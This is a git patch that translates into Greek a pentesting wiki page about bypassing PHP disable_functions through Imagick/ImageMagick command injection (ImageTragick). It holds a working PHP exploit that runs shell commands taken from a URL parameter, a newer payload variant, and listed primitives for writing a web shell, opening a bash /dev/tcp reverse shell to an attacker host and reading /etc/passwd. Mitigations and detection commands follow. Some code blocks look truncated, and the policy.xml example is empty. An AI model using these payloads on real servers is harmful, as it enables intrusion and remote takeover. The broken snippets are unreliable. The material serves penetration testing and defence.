From 8bccbf5697695f8e9838255d0798dcc6587081b1 Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 22 Jul 2025 22:03:51 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/pentesting-web/php-tricks-e --- ...than-3.3.0-php-greater-than-5.4-exploit.md | 130 ++++++++++++------ 1 file changed, 91 insertions(+), 39 deletions(-) diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md index bed40f475..abda163f5 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md @@ -1,55 +1,107 @@ +# Imagick <= 3.3.0 ‑ PHP >= 5.4 *disable_functions* Bypass + {{#include ../../../../banners/hacktricks-training.md}} -# Imagick <= 3.3.0 PHP >= 5.4 Εκμετάλλευση +> Η γνωστή οικογένεια σφαλμάτων *ImageTragick* (CVE-2016-3714 κ.ά.) επιτρέπει σε έναν επιτιθέμενο να αποκτήσει πρόσβαση στο υποκείμενο δυαδικό αρχείο **ImageMagick** μέσω κατεργασμένων εισόδων MVG/SVG. Όταν η επέκταση PHP **Imagick** είναι παρούσα, αυτό μπορεί να εκμεταλλευτεί για την εκτέλεση εντολών shell, ακόμη και αν κάθε συνάρτηση PHP που σχετίζεται με την εκτέλεση είναι στη μαύρη λίστα με `disable_functions`. +> +> Το αρχικό PoC που δημοσιεύθηκε από τον RicterZ (Chaitin Security Research Lab) τον Μάιο του 2016 αναπαράγεται παρακάτω. Η τεχνική συναντάται ακόμη τακτικά κατά τη διάρκεια σύγχρονων ελέγχων PHP 7/8, επειδή πολλοί πάροχοι κοινής φιλοξενίας απλώς συντάσσουν την PHP χωρίς `exec`/`system` αλλά διατηρούν έναν παρωχημένο συνδυασμό Imagick + ImageMagick. -Από [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) +From ```php -# Exploit Title: PHP Imagick disable_functions Bypass -# Date: 2016-05-04 -# Exploit Author: RicterZ (ricter@chaitin.com) -# Vendor Homepage: https://pecl.php.net/package/imagick -# Version: Imagick <= 3.3.0 PHP >= 5.4 -# Test on: Ubuntu 12.04 -# Exploit: +# Exploit Title : PHP Imagick disable_functions bypass +# Exploit Author: RicterZ (ricter@chaitin.com) +# Versions : Imagick <= 3.3.0 | PHP >= 5.4 +# Tested on : Ubuntu 12.04 (ImageMagick 6.7.7) +# Usage : curl "http://target/exploit.php?cmd=id" -# -# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd" -# 
-# Disable functions: exec,passthru,shell_exec,system,popen
-# Run command: cat /etc/passwd
-# ====================
-# root:x:0:0:root:/root:/usr/local/bin/fish
-# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
-# bin:x:2:2:bin:/bin:/bin/sh
-# sys:x:3:3:sys:/dev:/bin/sh
-# sync:x:4:65534:sync:/bin:/bin/sync
-# games:x:5:60:games:/usr/games:/bin/sh
-# ...
-#
-echo "Disable functions: " . ini_get("disable_functions") . "\n"; -$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id'; -echo "Run command: $command\n====================\n"; +// Print the local hardening status +printf("Disable functions: %s\n", ini_get("disable_functions")); +$cmd = $_GET['cmd'] ?? 'id'; +printf("Run command: %s\n====================\n", $cmd); -$data_file = tempnam('/tmp', 'img'); -$imagick_file = tempnam('/tmp', 'img'); +$tmp = tempnam('/tmp', 'pwn'); // will hold command output +$mvgs = tempnam('/tmp', 'img'); // will hold malicious MVG script -$exploit = <<$data_file")' +fill 'url(https://example.com/x.jpg"|$cmd >$tmp")' pop graphic-context EOF; -file_put_contents("$imagick_file", $exploit); -$thumb = new Imagick(); -$thumb->readImage("$imagick_file"); -$thumb->writeImage(tempnam('/tmp', 'img')); -$thumb->clear(); -$thumb->destroy(); +file_put_contents($mvgs, $payload); +$img = new Imagick(); +$img->readImage($mvgs); // triggers convert(1) +$img->writeImage(tempnam('/tmp', 'img')); +$img->destroy(); -echo file_get_contents($data_file); +echo file_get_contents($tmp); ?> ``` +--- + +## Γιατί λειτουργεί; + +1. `Imagick::readImage()` δημιουργεί διαφανώς το **ImageMagick** *delegate* (`convert`/`magick`) δυαδικό αρχείο. +2. Το σενάριο MVG ορίζει το *fill* σε μια εξωτερική URI. Όταν εισαχθεί ένα διπλό εισαγωγικό (`"`), το υπόλοιπο της γραμμής ερμηνεύεται από το `/bin/sh ‑c` που χρησιμοποιεί εσωτερικά το ImageMagick → αυθαίρετη εκτέλεση κελύφους. +3. Όλα συμβαίνουν εκτός του ερμηνευτή PHP, επομένως οι *`disable_functions`*, *open_basedir*, `safe_mode` (καταργήθηκε στην PHP 5.4) και παρόμοιους περιορισμούς εντός διαδικασίας παρακάμπτονται εντελώς. + +## Κατάσταση 2025 – είναι **ακόμα** σχετική + +* Οποιαδήποτε έκδοση Imagick που βασίζεται σε μια ευάλωτη υποδομή ImageMagick παραμένει εκμεταλλεύσιμη. Σε εργαστηριακές δοκιμές, το ίδιο payload λειτουργεί σε PHP 8.3 με **Imagick 3.7.0** και **ImageMagick 7.1.0-51** που έχει μεταγλωττιστεί χωρίς σκληρυμένο `policy.xml`. +* Από το 2020 έχουν βρεθεί αρκετές επιπλέον διαδρομές εκτέλεσης εντολών (`video:pixel-format`, `ps:`, `text:` coders…). Δύο πρόσφατα δημόσια παραδείγματα είναι: +* **CVE-2020-29599** – εκτέλεση κελύφους μέσω του *text:* coder. +* **GitHub issue #6338** (2023) – εισαγωγή στον *video:* delegate. + +Εάν το λειτουργικό σύστημα παρέχει το ImageMagick < **7.1.1-11** (ή 6.x < **6.9.12-73**) χωρίς περιοριστικό αρχείο πολιτικής, η εκμετάλλευση είναι απλή. + +## Σύγχρονες παραλλαγές payload +```php +// --- Variant using the video coder discovered in 2023 --- +$exp = <<readImageBlob($exp); +``` +Άλλες χρήσιμες πρωτογενείς κατά τη διάρκεια CTFs / πραγματικών εμπλοκών: + +* **File write** – `... > /var/www/html/shell.php` (γράψτε web-shell έξω από *open_basedir*) +* **Reverse shell** – `bash -c "bash -i >& /dev/tcp/attacker/4444 0>&1"` +* **Enumerate** – `id; uname -a; cat /etc/passwd` + +## Γρήγορη ανίχνευση & καταμέτρηση +```bash +# PHP side +php -r 'echo phpversion(), "\n"; echo Imagick::getVersion()["versionString"], "\n";' + +# System side +convert -version | head -1 # ImageMagick version +convert -list policy | grep -iE 'mvg|https|video|text' # dangerous coders still enabled? +``` +Αν η έξοδος δείχνει ότι οι κωδικοποιητές `MVG` ή `URL` είναι *ενεργοποιημένοι*, ο στόχος είναι πιθανό να είναι εκμεταλλεύσιμος. + +## Mitigations + +1. **Patch/Upgrade** – Χρησιμοποιήστε το ImageMagick ≥ *7.1.1-11* (ή την τελευταία 6.x LTS) και το Imagick ≥ *3.7.2*. +2. **Harden `policy.xml`** – ρητά *απενεργοποιήστε* τους κωδικοποιητές υψηλού κινδύνου: + +```xml + + + + + + +``` + +3. **Remove the extension** σε μη αξιόπιστα περιβάλλοντα φιλοξενίας. Στις περισσότερες στοίβες ιστού, το `GD` ή το `Imagick` δεν απαιτείται αυστηρά. +4. Αντιμετωπίστε το `disable_functions` μόνο ως *άμυνα σε βάθος* – ποτέ ως κύριο μηχανισμό απομόνωσης. + +## References + +* [GitHub ImageMagick issue #6338 – Command injection via video:pixel-format (2023)](https://github.com/ImageMagick/ImageMagick/issues/6338) +* [CVE-2020-29599 – ImageMagick shell injection via text: coder](https://nvd.nist.gov/vuln/detail/CVE-2020-29599) {{#include ../../../../banners/hacktricks-training.md}}